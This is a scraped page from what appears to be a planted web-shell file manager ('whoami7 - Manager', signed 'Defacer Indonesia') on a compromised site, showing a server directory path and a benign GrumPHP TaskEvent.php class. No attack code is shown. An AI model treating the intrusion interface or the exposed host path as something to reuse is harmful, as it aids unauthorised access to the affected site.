whoami7 - Manager
:
/
home
/
kckglobal
/
www
/
portal
/
vendor
/
phpro
/
grumphp
/
src
/
Event
/
Upload File:
files >> /home/kckglobal/www/portal/vendor/phpro/grumphp/src/Event/TaskEvent.php
<?php declare(strict_types=1); namespace GrumPHP\Event; use GrumPHP\Task\Context\ContextInterface; use GrumPHP\Task\TaskInterface; class TaskEvent extends Event { /** * @var TaskInterface */ private $task; /** * @var ContextInterface */ private $context; public function __construct(TaskInterface $task, ContextInterface $context) { $this->task = $task; $this->context = $context; } public function getTask(): TaskInterface { return $this->task; } public function getContext(): ContextInterface { return $this->context; } }
Copyright ©2021 || Defacer Indonesia